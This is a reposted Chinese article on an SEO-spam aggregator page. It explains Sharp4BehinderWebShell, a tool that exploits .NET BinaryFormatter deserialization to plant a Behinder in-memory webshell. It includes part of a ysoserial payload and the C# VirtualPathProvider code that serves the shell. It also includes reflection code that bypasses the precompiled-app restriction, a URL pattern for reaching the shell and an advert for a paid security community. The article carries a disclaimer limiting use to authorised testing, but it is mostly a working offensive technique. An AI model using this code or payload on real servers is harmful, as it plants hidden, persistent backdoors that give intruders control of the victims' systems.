当前位置: 首页 > news >正文

网站建设网站的好处推广计划书怎么写

网站建设网站的好处,推广计划书怎么写,如何在自己电脑上做网站,抖音代运营收费标准参考01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等#xff08;包括但不限于#xff09;进行检测或维护参考#xff0c;未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失#xf…01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等包括但不限于进行检测或维护参考未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失均由使用者本人负责。本文所提供的工具仅用于学习禁止用于其他方面 02基本介绍 Sharp4BehinderWebShell 是一款利用.NET反序列化漏洞向内存中植入冰蝎WebShell的工具。通过这种方式可以使用冰蝎客户端连接内存马获取WebShell并且支持在.NET预编译环境下使用。以下是对该工具的详细介绍包括其使用方法和代码解释。 03使用方法 使用ysoserial生成冰蝎内存马的反序列化攻击负载用于触发漏洞部分。以下是一个通过BinaryFormatter触发反序列化漏洞的示例负载由于比较长此处仅展示一部分内容。 AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG.........................接着将生成的反序列化攻击负载通过POST请求发送到目标服务器触发.NET反序列化漏洞成功后即植入冰蝎内存马。访问以下URL即可加载WebShell http://localhost:51448/fakepath31337/{0}.aspx此处的fakepath31337路径可以自定义通过修改Poc里的参数即可其中{0}表示占位符可以替换成任意字符比如请求 /fakepath31337/36.aspx 上图中没有出现异常错误随后通过冰蝎客户端成功连接到内存马执行命令如下图所示 04编码实现 Sharp4BehinderWebShell 主要通过注册自定义的虚拟路径提供程序VirtualPathProvider并结合反序列化攻击负载实现对目标服务器的控制。首先该类继承自 System.Web.Hosting.VirtualPathProvider用于注册虚拟路径提供程序重写其方法以提供自定义路径和文件内容。 public class SamplePathProvider : System.Web.Hosting.VirtualPathProvider {private string _virtualDir;private string _fileContent;public SamplePathProvider(string virtualDir, string fileContent): base(){_virtualDir  /  virtualDir.Replace(\, /);_virtualDir  _virtualDir.Replace(//, /).TrimEnd(/);// 初始化文件内容_fileContent  fileContent;}protected override void Initialize(){// 初始化操作可以在这里添加自定义逻辑} }接着该SampleVirtualFile类继承自 System.Web.Hosting.VirtualFile用于表示虚拟文件并提供文件内容具体代码如下所示。 public class SampleVirtualFile : System.Web.Hosting.VirtualFile {private string _fileContent;public bool Exists  true;public SampleVirtualFile(string virtualPath, string fileContent): base(virtualPath){// 初始化文件内容_fileContent  fileContent;}public override System.IO.Stream Open(){return new System.IO.MemoryStream(System.Text.Encoding.UTF8.GetBytes(_fileContent));} }同时工具通过反射修改 System.Web.Compilation.BuildManager 类的私有字段动态关闭预编译设置。如下所示。 if (System.Web.Compilation.BuildManager.IsPrecompiledApp) {var typeBuildManager  typeof(System.Web.Compilation.BuildManager);var field_theBuildManager  typeBuildManager.GetField(_theBuildManager, System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);var field_isPrecompiledAppComputed  typeBuildManager.GetField(_isPrecompiledAppComputed, System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);var field_isPrecompiledApp  typeBuildManager.GetField(_isPrecompiledApp, System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);var field_theBuildManager_instance  field_theBuildManager.GetValue(null);var field_isPrecompiledAppComputed_oldValue  field_isPrecompiledAppComputed.GetValue(field_theBuildManager_instance);var field_isPrecompiledApp_oldValue  field_isPrecompiledApp.GetValue(field_theBuildManager_instance);field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, true);field_isPrecompiledApp.SetValue(field_theBuildManager_instance, false);// 注册自定义的 VirtualPathProviderSystem.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, field_isPrecompiledAppComputed_oldValue);field_isPrecompiledApp.SetValue(field_theBuildManager_instance, field_isPrecompiledApp_oldValue); }这里通过 Compilation.BuildManager.IsPrecompiledApp 检查应用是否为预编译最后RegisterVirtualPathProvider(sampleProvider) 注册自定义的虚拟路径提供程序。 Sharp4BehinderWebShell 提供了一种利用.NET反序列化漏洞向内存中植入冰蝎WebShell的手段可以绕过.NET预编译环境的限制实现对目标系统的控制。 05.NET安全星球 星球汇聚了各行业安全攻防技术大咖并且每日分享.NET安全技术干货以及交流解答各类技术等问题社区中发布很多高质量的.NET安全资源可以说市面上很少见都是干货。 20个专题栏目涵盖了点、线、面、体等知识面助力师傅们快速成长其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。 我们倾力打造专刊、视频等配套学习资源循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
http://www.w-s-a.com/news/137746/

相关文章:

  • 汕头手机端建站模板pinterest app下载
  • 网站主机免费宁波网站建设优化诊断
  • 吧网站做软件的软件下载简单的ui界面制作
  • 陕西网站制作公司网页制作与设计代码
  • 做网站行情郑州微信网站开发
  • 河间网站建设制作null wordpress theme
  • h5网站制作网站开发网站建设文翻译工作
  • 网站建设 税种秦皇岛哪有网站优化公司
  • 专业开发网站设计找人做网页需要多少钱
  • 手机购物网站 建站网站建设网站制作网站设计
  • 基于iview的网站开发模板小程序制作需要什么语言
  • 精美网站设计保定建行网站首页登录
  • 网站建设常见问题做网站保存什么格式最好
  • 营销型网站建设与网页设计网站建设 amp 找VX cp5173
  • 新网站该如何做网站优化呢儿童手工
  • 湖北现代城市建设集团网站搜索引擎优化的作用
  • 上海做网站吧开一家软件开发公司需要什么
  • 阿里巴巴网站建设改图片建设厅官方网站河南
  • 邓砚谷电子商务网站建设镇江网
  • 网站空间支持什么程序工作服款式
  • 网站单页品牌网站建设 蝌蚪5小
  • 怎么做外贸网站需注意哪些做电脑系统的网站
  • 网站建设介绍推广用语河南网站优化外包服务
  • 课程网站模板贵州省城乡与建设厅网站
  • 网站模板及源码谁家网站用户体验做的好
  • 做网站的技术要求搜索栏在wordpress菜单上位置
  • 如何给网站弄ftpwordpress怎么添加关键词描述
  • 成都工程建设信息网站金科网站建设
  • 传媒公司 网站开发厦门网站建设门户
  • 宿城区建设局网站做网站的绿色背景图